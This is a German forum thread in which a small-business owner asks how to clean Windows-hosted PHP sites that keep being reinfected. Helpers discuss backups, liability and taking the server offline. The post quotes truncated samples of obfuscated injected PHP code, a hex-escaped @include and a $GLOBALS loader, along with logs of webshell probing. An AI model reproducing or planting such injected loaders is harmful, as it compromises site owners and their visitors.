Hallo,

Seit einiger Zeit werden meine Websites scheinbar von einem Trojaner befallen und ich weis nicht wie ich ihn beseitigen kann. Der Trojaner modifiziert bei mir einige PHP-Dateien und vor allem die Index.php Datei.
Wenn ich die seiten wieder korrigiere passiert wieder das selbe in den nächsten Tagen.
Hier ein paar Beispiele:

Fall 1:

HTML-Code:

/*7148c*/

@include "\x44:\x57WW\pi\x6cko\x2eat\x2fin\ usw.
/*7148c*/

Fall 2:

HTML-Code:

;$GLOBALS['y5097']=Array();global$y5097;$y5097=$GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['q7002']="\x61\x24\x65\x37\x71 usw.

Die Attacken sehen dann so aus, diese kommen dann meistens in der nacht:

Code: Alles auswählenAufklappen

ATTFilter

2017-04-24 04:23:36 POST /shopgate/ext/general17.php - 80 - 107.180.112.216 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686;+rv:24.0)+Gecko/20100101+Firefox/24.0 404 0 2 115
2017-04-24 04:23:39 POST /admin/includes/magnalister/cache/ini.php - 80 - 49.50.8.226 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686;+rv:24.0)+Gecko/20100101+Firefox/24.0 404 0 2 316
2017-04-24 04:23:44 POST /admin/gm/gm_opensearch/gm_opensearch_conf.php - 80 - 182.50.130.166 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686;+rv:24.0)+Gecko/20100101+Firefox/24.0 200 0 0 1767
2017-04-24 04:23:44 POST /hqeecy - 80 - 178.63.91.30 Mozilla/5.0+(X11;+Linux+x86_64;+rv:29.0)+Gecko/20100101+Firefox/29.0+SeaMonkey/2.26 404 0 2 26
2017-04-24 04:23:44 POST /index.php fkvk=drmw 80 - 178.63.91.30 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686;+rv:24.0)+Gecko/20100101+Firefox/24.0 200 0 0 32
         

<?

Hat jemand Eufahrung mit so einen Trojaner.

Folgendes habe ich bereits gemacht
1. PHP upgedatet
2. Alle von mir gefundenen modifizierten Dateien behoben korrigiert.

Ich fürchte du bist hier im falschen Unterbereich. Oder läuft dein Webserver unter Windows?

Steht doch im Threadtitel.

WS 2008 R2

Ging aber ziemlich unter. Und einfach nur Windows im Threadtitel ist auch nicht gerade informativ.

Ist das ein gewerblich genutztes System?

Tut das was zur Sache?

Glaubst ich frag das nur aus Spaß?
Wir haben hier gewisse Regeln bzgl gewerblich genutzter Systeme. Siehe http://www.trojaner-board.de/108422-...-anfragen.html

Bereinigung von gewerblich genutzten Rechnern

Grundsätzlich bereinigen wir keine gewerblich genutzen Rechner. Dafür ist die IT Abteilung eurer Firma zuständig.

Bei Kleinunternehmen, welche keinen eigenen IT Support haben, machen wir da eine Ausnahme und helfen gerne (kleine Spende hilft auch uns). Voraussetzung: Ihr teilt uns dies in eurer ersten Antwort mit. Bedenkt jedoch, dass Logfiles viele heikle Informationen enthalten können (Kundendaten, Bankdaten, etc.) sowie das Malware genauso wie unsere Scanner die Möglichkeit besitzt, diese auszuspähen und zu missbrauchen. Hier legen wir euch ein Formatieren und Neuaufsetzen nahe. Hier gilt insbesondere, dass wir im Nachhinein keine Logfiles löschen werden, egal wie sehr "euer Chef das auch will".

Okay, also es laufen nur 2 Gewerblich genutzte Seiten drauf. Ein Gambioshop und eine von mir entwicklelte ISAPI dll.

Sonst laufen 1-3 Joomla/Wordpress seiten drauf. Sind aber eher Privatseiten.

Ja, meine Firma ist sehr klein. Ich selber bin quasi der Systemadmin aber das ist nicht mein Hauptgebiet.
Alle wirklichen Systemadmins die ich kenne empfehlen mir alles auf Linux umzustellen, aber da fehlt mir leider das Wissen dazu. Meine ISAPI DLL würde darauf auch nicht laufen.

Mir geht es aber eigentlich darum wo kann ich da jetzt anpacken.


Zusätzliche Info zum Trojaner, er versucht über das Include immer eine Datei faviicon_xxxxx.ico anzulegen.

Zitat:

Alle wirklichen Systemadmins die ich kenne empfehlen mir alles auf Linux umzustellen

Das hätte ich auch getan. Windows als Webserver, oje...

Desktop-Systeme kann man gut bereinigen. Aber bei Webservern und dann auch noch Windows ist das was anderes.

1. Warum hast du kein Desaster-Recpvery-Konzept? Du verarbeitest und speicherst sensible Kundendaten!
2. Was genau alles kann man aus dem Internet auf diesem Rechner erreichen, sprich wie das das Teil über welche Maßnahmen abgesichert?

Wir kommen hier scheinbar so nicht weiter! Hm...

Wieso kannst du nicht einfach die Fragen beantworten?
Dein System wurde erwischt, und? Dann muss man sich auch den Konsquenzen und Fragen stellen.

Deine Fragen helfen mir nicht weiter, im nachhinein ist man immer schlauer.

Möchtest du helfen oder nicht? Es geht doch jetzt rein darum wie man die Trojaner jetzt bekämpft. Scheinbar weist du es nicht und lenkst mich mit zum jetzigen Zeitpunkt sinnlosen Fragen ab.

Sorry, aber ich verstehe deine Fragen nicht !!!

Wie du oben lesen kannst, bin ich kein richtiger Systemadmin und deswegen kann ich auch logischerweise keine hoch sicherheitskonzepte präsentieren!

Genau. Ich hab 160.000 Beiträge die nur vor lauter Unwissenheit strotzen.

Wie der Webserver von außen erreichbar ist ja auch voll unwichtig. Hat ja nur was mit Sicherheit zu tun. Und Backups? Ach was, das ist eh nur was für Weicheier.

Da ich kein Anwalt bin ist dies keine Rechtsberatung, sondern ein Tipp meine Behauptung per Google zu prüfen: wenn du einen gekaperten Webserver (ob per Trojaner oder eine beliebige andere Sicherheitslücke) betreibst bist du zivilrechtlich für alles haftbar was der Server anstellt, gerade auch die Dinge die der Kriminelle mit deinem Server anstellt. Nur falls der Kriminelle geschnappt werden sollte kannst du versuchen ihn auf Schadenersatz zu verklagen.


Ich kam darauf als ich drüber nachdachte mir einen Server zu mieten... und ließ es dann bleiben.

Die logische Konsequenz wäre also dass du deinen Server vom Netz nimmst bis die Art des Einbruchs ("Trojaner" ist bei Servern eher selten) geklärt und die Sicherheitslücke geschlossen ist. Der ist och zur Zeit bestimmt noch am Netz? Wenn ja: dein Risiko,

Ich gebe auch ja Teilweise recht, nur Theorie und Praxis ist ein wesentlicher Unterschied!

Bin doch dabei den Server zu säubern, nur ist das ganze nicht so leicht, wenn die Seite Offline ist, passiert auch nichts.

Wenn du die Dienste offline gestellt hast und die Logdateien erstmal gesichert hast dann bist du auf nem guten Pfad. Um herauszufinden wie der Einbruch geschah fürchte ich dass du einen Server Profi benötigst...